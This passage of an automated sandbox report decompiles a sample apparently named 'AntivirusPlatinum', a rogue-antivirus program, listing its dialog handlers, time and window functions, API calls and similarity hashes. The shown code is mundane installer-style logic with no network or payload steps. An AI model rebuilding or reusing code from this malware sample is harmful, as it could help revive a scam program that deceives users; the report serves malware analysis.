                                                                                                                                                              0x0040bbea
                                                                                                                                                              0x0040bc3d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bc3d
                                                                                                                                                              0x0040bbec
                                                                                                                                                              0x0040bbed
                                                                                                                                                              0x0040bc16
                                                                                                                                                              0x0040bc17
                                                                                                                                                              0x0040bc2b
                                                                                                                                                              0x0040bc2e
                                                                                                                                                              0x0040bc38
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bc38
                                                                                                                                                              0x0040bc19
                                                                                                                                                              0x0040bc1a
                                                                                                                                                              0x0040bc57
                                                                                                                                                              0x0040bc57
                                                                                                                                                              0x0040bc1c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bc1c
                                                                                                                                                              0x0040bc0c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bc0e
                                                                                                                                                              0x0040bc11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bc11
                                                                                                                                                              0x0040bc4c
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DialogParam
                                                                                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                              • API String ID: 665744214-56093855
                                                                                                                                                              • Opcode ID: ece71fc73592af66301a70e679c12dd9b2103662e6c74d0171aeeb951f2b0c10
                                                                                                                                                              • Instruction ID: 33d4027af350ab9e8ad30dbbcb82d9e90b0d9a51744802c5390a1546dc0066f1
                                                                                                                                                              • Opcode Fuzzy Hash: ece71fc73592af66301a70e679c12dd9b2103662e6c74d0171aeeb951f2b0c10
                                                                                                                                                              • Instruction Fuzzy Hash: 0B213A30158349ABEB12CF14EC10BD63FA0EB15344F188076E945AA3E1CBB9AD50DBAD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0040B193(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				struct HWND__* _t21;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				CHAR* _t23;
                                                                                                                                                              
                                                                                                                                                              				_t21 = _a4;
                                                                                                                                                              				_t23 = _a16;
                                                                                                                                                              				E0040309D(_t22, _t21, _a8, _a12, _t23, "RENAMEDLG", 0, 0);
                                                                                                                                                              				_t9 = _a8 - 0x110;
                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                              					 *0x41f320 = _t23;
                                                                                                                                                              					SetDlgItemTextA(_t21, 0x65, _t23);
                                                                                                                                                              					SetDlgItemTextA(_t21, 0x66, _t23);
                                                                                                                                                              					L9:
                                                                                                                                                              					return 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t9 != 1) {
                                                                                                                                                              					L4:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                              				if(_t17 == 0) {
                                                                                                                                                              					SendDlgItemMessageA(_t21, 0x66, 0xd, 0x50,  *0x41f320);
                                                                                                                                                              					_push(1);
                                                                                                                                                              					L6:
                                                                                                                                                              					EndDialog(_t21, ??);
                                                                                                                                                              					goto L9;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t17 == 1) {
                                                                                                                                                              					_push(0);
                                                                                                                                                              					goto L6;
                                                                                                                                                              				}
                                                                                                                                                              				goto L4;
                                                                                                                                                              			}








                                                                                                                                                              0x0040b197
                                                                                                                                                              0x0040b19c
                                                                                                                                                              0x0040b1b0
                                                                                                                                                              0x0040b1b8
                                                                                                                                                              0x0040b1bd
                                                                                                                                                              0x0040b1fb
                                                                                                                                                              0x0040b201
                                                                                                                                                              0x0040b207
                                                                                                                                                              0x0040b209
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b20b
                                                                                                                                                              0x0040b1c0
                                                                                                                                                              0x0040b1cc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b1cc
                                                                                                                                                              0x0040b1c6
                                                                                                                                                              0x0040b1c7
                                                                                                                                                              0x0040b1e7
                                                                                                                                                              0x0040b1ed
                                                                                                                                                              0x0040b1d1
                                                                                                                                                              0x0040b1d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b1d2
                                                                                                                                                              0x0040b1ca
                                                                                                                                                              0x0040b1d0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b1d0
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 0040B1D2
                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000066,0000000D,00000050,?), ref: 0040B1E7
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040B201
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040B207
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Item$Text$DialogMessageSend
                                                                                                                                                              • String ID: RENAMEDLG
                                                                                                                                                              • API String ID: 1109518134-3299779563
                                                                                                                                                              • Opcode ID: f0ac5b148682c27e8b841de141a9e01bb37ae873fefba3ba11adc6c704d29104
                                                                                                                                                              • Instruction ID: 19bae5b26799f046c8e57332e4b758996fbe75a27c9b904ad18449bb2b017feb
                                                                                                                                                              • Opcode Fuzzy Hash: f0ac5b148682c27e8b841de141a9e01bb37ae873fefba3ba11adc6c704d29104
                                                                                                                                                              • Instruction Fuzzy Hash: 9A01B172240219B6D7205F669C49EAB3F2CEB497A1F004426BA19B90C1C2BA8421D7FC
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040B2A9(CHAR* _a8, char _a12) {
                                                                                                                                                              				char _v4100;
                                                                                                                                                              				char* _t7;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				long _t17;
                                                                                                                                                              
                                                                                                                                                              				_t7 = E00401200(0x1000);
                                                                                                                                                              				if( *0x419f78 == 0) {
                                                                                                                                                              					_t7 = _a8;
                                                                                                                                                              					if( *_t7 != 0) {
                                                                                                                                                              						_t17 = GetLastError();
                                                                                                                                                              						_t2 =  &_a12; // 0x40555d
                                                                                                                                                              						wvsprintfA( &_v4100, _a8, _t2);
                                                                                                                                                              						_t13 = E0040AE5A(0x4122d8,  &_v4100);
                                                                                                                                                              						if(_t17 != 0) {
                                                                                                                                                              							SetLastError(_t17);
                                                                                                                                                              						}
                                                                                                                                                              						return _t13;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t7;
                                                                                                                                                              			}







                                                                                                                                                              0x0040b2b1
                                                                                                                                                              0x0040b2bd
                                                                                                                                                              0x0040b2bf
                                                                                                                                                              0x0040b2c5
                                                                                                                                                              0x0040b2ce
                                                                                                                                                              0x0040b2d0
                                                                                                                                                              0x0040b2de
                                                                                                                                                              0x0040b2f0
                                                                                                                                                              0x0040b2f9
                                                                                                                                                              0x0040b2fc
                                                                                                                                                              0x0040b2fc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b302
                                                                                                                                                              0x0040b2c5
                                                                                                                                                              0x0040b304

                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(00414C7C,?,004032F4,00000000,00000000,00000076,?,00000000,00404FA1,00000017,00000000,00000000,004054A9,?), ref: 0040B2C8
                                                                                                                                                              • wvsprintfA.USER32 ref: 0040B2DE
                                                                                                                                                                • Part of subcall function 0040AE5A: wvsprintfA.USER32 ref: 0040AE7B
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,004032F4,00000000,00000000,00000076,?,00000000,00404FA1,00000017,00000000,00000000,004054A9,?), ref: 0040B2FC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastwvsprintf
                                                                                                                                                              • String ID: @Met$]U@
                                                                                                                                                              • API String ID: 2157943386-3341597904
                                                                                                                                                              • Opcode ID: 05e9acf8f71246b7a0c130bf83baa347096ba25980d1154a7551ccc3d37d6479
                                                                                                                                                              • Instruction ID: d4fdff9da87b2b6eb3902b3be9dba9c97109d9518f32d3958c30564e7a0a465c
                                                                                                                                                              • Opcode Fuzzy Hash: 05e9acf8f71246b7a0c130bf83baa347096ba25980d1154a7551ccc3d37d6479
                                                                                                                                                              • Instruction Fuzzy Hash: 1CF0E23240461CABDB129B24DC08BDE33ACEF09395F1041B6F805E2290C7B89E808B9D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406C6F(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                              				void* _t7;
                                                                                                                                                              				void* _t11;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              				long _t26;
                                                                                                                                                              				struct HWND__* _t27;
                                                                                                                                                              
                                                                                                                                                              				_t7 = _a8 - 1;
                                                                                                                                                              				_t27 = _a4;
                                                                                                                                                              				_t26 = _a16;
                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                              					E00406BCC(__ebx, GetWindowLongA(_t27, 0xffffffeb), __eflags, _t27);
                                                                                                                                                              				} else {
                                                                                                                                                              					_t11 = _t7 - 1;
                                                                                                                                                              					if(_t11 == 0) {
                                                                                                                                                              						E004064B3(GetWindowLongA(_t27, 0xffffffeb));
                                                                                                                                                              					} else {
                                                                                                                                                              						_t14 = _t11 - 3;
                                                                                                                                                              						if(_t14 == 0) {
                                                                                                                                                              							E004064E2(GetWindowLongA(_t27, 0xffffffeb), _t26 & 0x0000ffff, _t26 >> 0x10);
                                                                                                                                                              						} else {
                                                                                                                                                              							if(_t14 == 0x7c) {
                                                                                                                                                              								SetWindowLongA(_t27, 0xffffffeb,  *_t26);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return DefWindowProcA(_t27, _a8, _a12, _t26);
                                                                                                                                                              			}








                                                                                                                                                              0x00406c75
                                                                                                                                                              0x00406c77
                                                                                                                                                              0x00406c7b
                                                                                                                                                              0x00406c7e
                                                                                                                                                              0x00406cd4
                                                                                                                                                              0x00406c80
                                                                                                                                                              0x00406c80
                                                                                                                                                              0x00406c81
                                                                                                                                                              0x00406cc1
                                                                                                                                                              0x00406c83
                                                                                                                                                              0x00406c83
                                                                                                                                                              0x00406c86
                                                                                                                                                              0x00406caf
                                                                                                                                                              0x00406c88
                                                                                                                                                              0x00406c8b
                                                                                                                                                              0x00406c92
                                                                                                                                                              0x00406c92
                                                                                                                                                              0x00406c8b
                                                                                                                                                              0x00406c86
                                                                                                                                                              0x00406c81
                                                                                                                                                              0x00406cea

                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowLongA.USER32(?,000000EB,?), ref: 00406C92
                                                                                                                                                              • GetWindowLongA.USER32 ref: 00406C9D
                                                                                                                                                              • GetWindowLongA.USER32 ref: 00406CB9
                                                                                                                                                              • GetWindowLongA.USER32 ref: 00406CCB
                                                                                                                                                              • DefWindowProcA.USER32(?,?,?,?,?), ref: 00406CE1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Long$Proc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3468714886-0
                                                                                                                                                              • Opcode ID: 1b70b1437c5452307bdbe11857104811a4f517da2f4235cb28a3aaf30c274c68
                                                                                                                                                              • Instruction ID: 61735104a588f96fdd1966c9f8756a4b7932e2efd5c0c580c1dd5b3652aebea8
                                                                                                                                                              • Opcode Fuzzy Hash: 1b70b1437c5452307bdbe11857104811a4f517da2f4235cb28a3aaf30c274c68
                                                                                                                                                              • Instruction Fuzzy Hash: D0018435108024B7DF055F69AE18CAF3B68DE99330712462AF513F22E0C679993196AD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040DF79(void* __ebx, signed int* __ecx, FILETIME* _a4) {
                                                                                                                                                              				struct _FILETIME _v12;
                                                                                                                                                              				struct _FILETIME _v20;
                                                                                                                                                              				struct _SYSTEMTIME _v36;
                                                                                                                                                              				signed int _t34;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              				signed int _t50;
                                                                                                                                                              				intOrPtr* _t56;
                                                                                                                                                              				signed int* _t57;
                                                                                                                                                              
                                                                                                                                                              				_t57 = __ecx;
                                                                                                                                                              				FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                                                                                              				FileTimeToSystemTime( &_v12,  &_v36);
                                                                                                                                                              				_t34 = _v36.wDay & 0x0000ffff;
                                                                                                                                                              				_t50 = _v36.wMonth & 0x0000ffff;
                                                                                                                                                              				_t51 = _v36.wYear & 0x0000ffff;
                                                                                                                                                              				_t57[3] = _v36.wHour & 0x0000ffff;
                                                                                                                                                              				_t57[2] = _t34;
                                                                                                                                                              				_t57[4] = _v36.wMinute & 0x0000ffff;
                                                                                                                                                              				_t57[8] = _t34 - 1;
                                                                                                                                                              				_t57[5] = _v36.wSecond & 0x0000ffff;
                                                                                                                                                              				_t37 = 1;
                                                                                                                                                              				 *_t57 = _v36.wYear & 0x0000ffff;
                                                                                                                                                              				_t57[1] = _t50;
                                                                                                                                                              				_t57[7] = _v36.wDayOfWeek & 0x0000ffff;
                                                                                                                                                              				if(_t50 > 1) {
                                                                                                                                                              					_t56 = 0x4140ec;
                                                                                                                                                              					do {
                                                                                                                                                              						_t57[8] = _t57[8] +  *_t56;
                                                                                                                                                              						_t37 = _t37 + 1;
                                                                                                                                                              						_t56 = _t56 + 4;
                                                                                                                                                              					} while (_t37 < _t50);
                                                                                                                                                              				}
                                                                                                                                                              				if(_t50 > 2 && E0040DF44(_t51) != 0) {
                                                                                                                                                              					_t57[8] = _t57[8] + 1;
                                                                                                                                                              				}
                                                                                                                                                              				_v36.wMilliseconds = 0;
                                                                                                                                                              				SystemTimeToFileTime( &_v36,  &_v20);
                                                                                                                                                              				_t57[6] = _v12.dwLowDateTime - _v20.dwLowDateTime;
                                                                                                                                                              				return _t57;
                                                                                                                                                              			}











                                                                                                                                                              0x0040df88
                                                                                                                                                              0x0040df8a
                                                                                                                                                              0x0040df98
                                                                                                                                                              0x0040dfa2
                                                                                                                                                              0x0040dfa6
                                                                                                                                                              0x0040dfaa
                                                                                                                                                              0x0040dfae
                                                                                                                                                              0x0040dfb5
                                                                                                                                                              0x0040dfb8
                                                                                                                                                              0x0040dfc0
                                                                                                                                                              0x0040dfc5
                                                                                                                                                              0x0040dfcc
                                                                                                                                                              0x0040dfcd
                                                                                                                                                              0x0040dfcf
                                                                                                                                                              0x0040dfd2
                                                                                                                                                              0x0040dfd7
                                                                                                                                                              0x0040dfd9
                                                                                                                                                              0x0040dfdf
                                                                                                                                                              0x0040dfe1
                                                                                                                                                              0x0040dfe4
                                                                                                                                                              0x0040dfe5
                                                                                                                                                              0x0040dfe8
                                                                                                                                                              0x0040dfec
                                                                                                                                                              0x0040dff0
                                                                                                                                                              0x0040dffc
                                                                                                                                                              0x0040dffc
                                                                                                                                                              0x0040e001
                                                                                                                                                              0x0040e00d
                                                                                                                                                              0x0040e01a
                                                                                                                                                              0x0040e021

                                                                                                                                                              APIs
                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,01000000,00000000,?,?,?,?), ref: 0040DF8A
                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040DF98
                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E00D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$File$System$Local
                                                                                                                                                              • String ID: @A
                                                                                                                                                              • API String ID: 2859370177-361999007
                                                                                                                                                              • Opcode ID: 89950de3dffe1bcad7401ddb42f8c5d8fd6609ab17a9cf8c41317c6ad1f43135
                                                                                                                                                              • Instruction ID: 1aaad987808f3aa0f3819d0692f069d438d8aa74b184443fbbc98788e9bd99ff
                                                                                                                                                              • Opcode Fuzzy Hash: 89950de3dffe1bcad7401ddb42f8c5d8fd6609ab17a9cf8c41317c6ad1f43135
                                                                                                                                                              • Instruction Fuzzy Hash: 4B212CB5D0021A9BCB64DFA9C8408FFFBF9FE48701B00852BE596E3640E3749554CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E0040B3DA(void* __ecx, void* __edx, struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				intOrPtr _t21;
                                                                                                                                                              				struct HWND__* _t26;
                                                                                                                                                              				CHAR* _t27;
                                                                                                                                                              
                                                                                                                                                              				_t27 = _a16;
                                                                                                                                                              				_t26 = _a4;
                                                                                                                                                              				E0040309D(__edx, _t26, _a8, _a12, _t27, "ASKNEXTVOL", 0, 0);
                                                                                                                                                              				_t9 = _a8 - 0x110;
                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                              					 *0x41f324 = _t27;
                                                                                                                                                              					_push(_t27);
                                                                                                                                                              					L12:
                                                                                                                                                              					SetDlgItemTextA(_t26, 0x65, ??);
                                                                                                                                                              					L13:
                                                                                                                                                              					return 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t9 != 1) {
                                                                                                                                                              					L5:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t16 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                              				if(_t16 == 0) {
                                                                                                                                                              					GetDlgItemTextA(_t26, 0x65,  *0x41f324, 0x400);
                                                                                                                                                              					_push(1);
                                                                                                                                                              					L9:
                                                                                                                                                              					EndDialog(_t26, ??);
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				_t19 = _t16 - 1;
                                                                                                                                                              				if(_t19 == 0) {
                                                                                                                                                              					_push(0);
                                                                                                                                                              					goto L9;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t19 == 0x64) {
                                                                                                                                                              					_t21 = E004073DB( *0x41f324);
                                                                                                                                                              					if(E00402854(_t26, E004098F7(0x7b),  *0x41f324, _t21, 0) == 0) {
                                                                                                                                                              						goto L13;
                                                                                                                                                              					}
                                                                                                                                                              					_push( *0x41f324);
                                                                                                                                                              					goto L12;
                                                                                                                                                              				}
                                                                                                                                                              				goto L5;
                                                                                                                                                              			}









                                                                                                                                                              0x0040b3de
                                                                                                                                                              0x0040b3e2
                                                                                                                                                              0x0040b3f6
                                                                                                                                                              0x0040b3fe
                                                                                                                                                              0x0040b403
                                                                                                                                                              0x0040b46c
                                                                                                                                                              0x0040b472
                                                                                                                                                              0x0040b473
                                                                                                                                                              0x0040b476
                                                                                                                                                              0x0040b47c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b47e
                                                                                                                                                              0x0040b406
                                                                                                                                                              0x0040b417
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b417
                                                                                                                                                              0x0040b40c
                                                                                                                                                              0x0040b40d
                                                                                                                                                              0x0040b462
                                                                                                                                                              0x0040b468
                                                                                                                                                              0x0040b44b
                                                                                                                                                              0x0040b44c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b44c
                                                                                                                                                              0x0040b40f
                                                                                                                                                              0x0040b410
                                                                                                                                                              0x0040b449
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b449
                                                                                                                                                              0x0040b415
                                                                                                                                                              0x0040b423
                                                                                                                                                              0x0040b43f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b441
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b441
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemText$Dialog
                                                                                                                                                              • String ID: ASKNEXTVOL
                                                                                                                                                              • API String ID: 1770891597-3402441367
                                                                                                                                                              • Opcode ID: 2885259856bbc6aa6553a756ccb99f7839e3b2c9107fb590f79719ba2a1ce419
                                                                                                                                                              • Instruction ID: ec2075d0238c7e63290f5753f8087d9ea159937018a848bc657c4fc681144771
                                                                                                                                                              • Opcode Fuzzy Hash: 2885259856bbc6aa6553a756ccb99f7839e3b2c9107fb590f79719ba2a1ce419
                                                                                                                                                              • Instruction Fuzzy Hash: E1118631144105BAD7116F619D09FBB3B78DB45B05F008036FB11B51D3C7B99922E7AD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 004027E5
                                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,?), ref: 00402820
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BrowseFolderMalloc
                                                                                                                                                              • String ID: A
                                                                                                                                                              • API String ID: 3812826013-3554254475
                                                                                                                                                              • Opcode ID: e084dcdc2e68c703b4ff934256cf9c76efc63f7733db7aac15ed6670e094de69
                                                                                                                                                              • Instruction ID: 12db1c29d20bd6851e06055d48ea0fd08f2e62197319b2c166d741977c5f3b3f
                                                                                                                                                              • Opcode Fuzzy Hash: e084dcdc2e68c703b4ff934256cf9c76efc63f7733db7aac15ed6670e094de69
                                                                                                                                                              • Instruction Fuzzy Hash: 8F012D76900219AFCF00DFA4C909BEF7BF8AF49311F104566E905E7284D778DA15DBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E0040B213(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                              				void* _t10;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				struct HWND__* _t22;
                                                                                                                                                              
                                                                                                                                                              				_t22 = _a4;
                                                                                                                                                              				E0040309D(_t21, _t22, _a8, _a12, _a16, "GETPASSWORD1", 0, 0);
                                                                                                                                                              				_t10 = _a8 - 0x110;
                                                                                                                                                              				if(_t10 == 0) {
                                                                                                                                                              					SetDlgItemTextA(_t22, 0x66, _a16);
                                                                                                                                                              					L9:
                                                                                                                                                              					return 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t10 != 1) {
                                                                                                                                                              					L4:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                              				if(_t17 == 0) {
                                                                                                                                                              					GetDlgItemTextA(_t22, 0x65, 0x419ee8, 0x80);
                                                                                                                                                              					_push(1);
                                                                                                                                                              					L6:
                                                                                                                                                              					EndDialog(_t22, ??);
                                                                                                                                                              					goto L9;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t17 == 1) {
                                                                                                                                                              					_push(0);
                                                                                                                                                              					goto L6;
